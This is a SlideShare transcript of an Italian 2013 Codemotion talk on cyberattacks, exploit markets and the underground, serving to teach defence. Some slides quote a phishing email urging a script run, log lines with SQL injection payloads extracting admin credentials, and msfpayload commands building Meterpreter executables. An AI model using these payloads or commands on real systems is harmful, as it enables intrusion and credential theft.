SlideShare una empresa de Scribd logo

Attacchi, bugie e underground digitale by Andrea Pompili

Codemotion
Codemotion

Possibile che, dopo anni di leaks indiscriminati, conti correnti svuotati e attacchi persistenti di tutte le forme e colori, non sia cambiato nulla? Possibile che, nonostante le OWASP Top 10 citate fino alla nausea e le grida disperate degli espertoni di sicurezza, certe abitudini rimangano così dure a morire? Tra verità e leggende, cercheremo di capire cosa realmente conta per il povero attaccante e cosa, purtroppo, offre il mondo di un’information technology perennemente abbagliata dal mito della scatola magica.

TecnologíaDesarrollo personal
1 de 36
Descargar para leer sin conexión
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com ATTACCHI, BUGIE E UNDERGROUND DIGITALE Speaker: Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com « » > Bonifica e Hardening fatta a tappeto un anno prima > Sistemi Operativi Patched all’ultima versione disponibile > Logging integrale di tutte le attività del Sito > 2 Sistemi IPS (Intrusion Prevention System) in cascata
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Outside 70% Inside - Accidental 12% Inside - Malicious 9% Inside 5% Unknown 4% Source: http://datalossdb.org/ Statistiche 2012
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 7,20% 6,20% 6,10% 5,70% 6,80% 6,80% 29,90% 41,20% 27,20% 34,10% 34,10% 30,70% 62,90% 52,60% 66,70% 60,20% 59,10% 62,50% Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 76,00% 3,80% 16,80% 3,40% 76,00% 6,50% 13,70% 3,80% 76,40% 6,70% 13,70% 3,20% Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com «Non è obiettivo di questo “focus” riportare in dettaglio i risultati della rilevazione ma analizzando i dati relativi ai valori medi per l’intero campione si può ritenere che i risultati siano: • soddisfacenti per la protezione logica; • molto soddisfacenti per la sicurezza dell’infrastruttura; • sufficienti per la sicurezza dei servizi; • da migliorare per la sicurezza dell’organizzazione. «Possiamo dire che ce l’aspettavamo»
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Aki Mon Telecom Shane Atkinson Canter & Siegel Eddie Davidson Peter Francis-Macrae Davis Wolfgang Hawke Jumpstart Technologies Vandar Kushnir Kevin Lipnitz Wayne Mansfield Oleg Nikolaenko Alan Ralsky Dave Rhodes Scott Richter Russian Business Network iFrame Cash SBT Telecom Network Defcon Host Micronnet Ltd. InstallsCash Sendar Argic Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011 RBNet
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com (*) According to Frank Rieger Chief technology officer at GSMK
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox. (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html) Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser- sandbox-first-to-fall/10588)
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Blackole Exploit Kit Cool Exploit Kit
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Da: hdesk@rcs.it Inviato: Thursday, November 04, 2004 7:48 PM A: xxxxxx@rcs.it Oggetto: Aggiornamento configurazione Salve, riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di aggiornare collegandosi al seguente indirizzo: http://xxxx.rcs.it/software/av/index.html La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo dell'aggiornamento. Distinti Saluti Help Desk - Supporto Tecnico RCS RCS Editori S.p.A. - Settore Quotidiani
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0" 178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]= 1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a, substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64), floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]= 11502+and(select+1+from(select+count(*),concat_ws(0x3a, substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin), repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor( rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10" Web Shell Extension
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://evader.stonesoft.com/ http://insecure.org/stf/secnet_ids/secnet_ids.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com <#1> Ragiona come un Attaccante in modo da comprendere cosa faranno e come ti attaccheranno <#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma soprattutto i vincoli operativi che hanno <#3> Identifica il valore «percepito» di ciò che vuoi difendere, ma soprattutto cosa vuoi difendere <#4> Lavora su tutto il perimetro di difesa, senza atti di fede <#5> Se la tua difesa è più economica dell’attacco, tu sarai sempre in vantaggio
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian

Recomendados

The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 
The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili Codemotion
 
Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?Codemotion
 
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....Codemotion
 
Use of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in LewishamUse of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in Lewishamlocalinsight
 
Startup in Action - Appandmap pitch
Startup in Action - Appandmap pitchStartup in Action - Appandmap pitch
Startup in Action - Appandmap pitchCodemotion
 
Demistifying the 3D Web
Demistifying the 3D WebDemistifying the 3D Web
Demistifying the 3D WebCodemotion
 
Polymer is production ready, how about you?
Polymer is production ready, how about you?Polymer is production ready, how about you?
Polymer is production ready, how about you?Codemotion
 

Recomendados

The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 
The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili Codemotion
 
Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?Codemotion
 
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....Codemotion
 
Use of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in LewishamUse of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in Lewishamlocalinsight
 
Startup in Action - Appandmap pitch
Startup in Action - Appandmap pitchStartup in Action - Appandmap pitch
Startup in Action - Appandmap pitchCodemotion
 
Demistifying the 3D Web
Demistifying the 3D WebDemistifying the 3D Web
Demistifying the 3D WebCodemotion
 
Polymer is production ready, how about you?
Polymer is production ready, how about you?Polymer is production ready, how about you?
Polymer is production ready, how about you?Codemotion
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Codemotion
 
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Codemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisCodemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Codemotion
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyCodemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Codemotion
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsVMware Tanzu
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...VMware Tanzu
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreLukas Eder
 
Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Reshmi Krishna
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMECasey Ellis
 
Better Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinBetter Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinVMware Tanzu
 
PCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaPCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaVMware Tanzu
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011Ashwin Patil, GCIH, GCIA, GCFE
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1scientificcuff635
 
Superhelt 2013-screen
Superhelt 2013-screenSuperhelt 2013-screen
Superhelt 2013-screenHenrik Kramshøj
 
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaCodemotion
 

Más contenido relacionado

Similar a Attacchi, bugie e underground digitale by Andrea Pompili

Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Codemotion
 
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Codemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisCodemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Codemotion
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyCodemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Codemotion
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsVMware Tanzu
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...VMware Tanzu
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreLukas Eder
 
Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Reshmi Krishna
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMECasey Ellis
 
Better Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinBetter Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinVMware Tanzu
 
PCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaPCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaVMware Tanzu
 

Similar a Attacchi, bugie e underground digitale by Andrea Pompili (20)

Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymore
 
Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
 
Better Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinBetter Than BASH: Scripting Kotlin
Better Than BASH: Scripting Kotlin
 
PCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaPCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and Grafana
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Superhelt 2013-screen
Superhelt 2013-screenSuperhelt 2013-screen
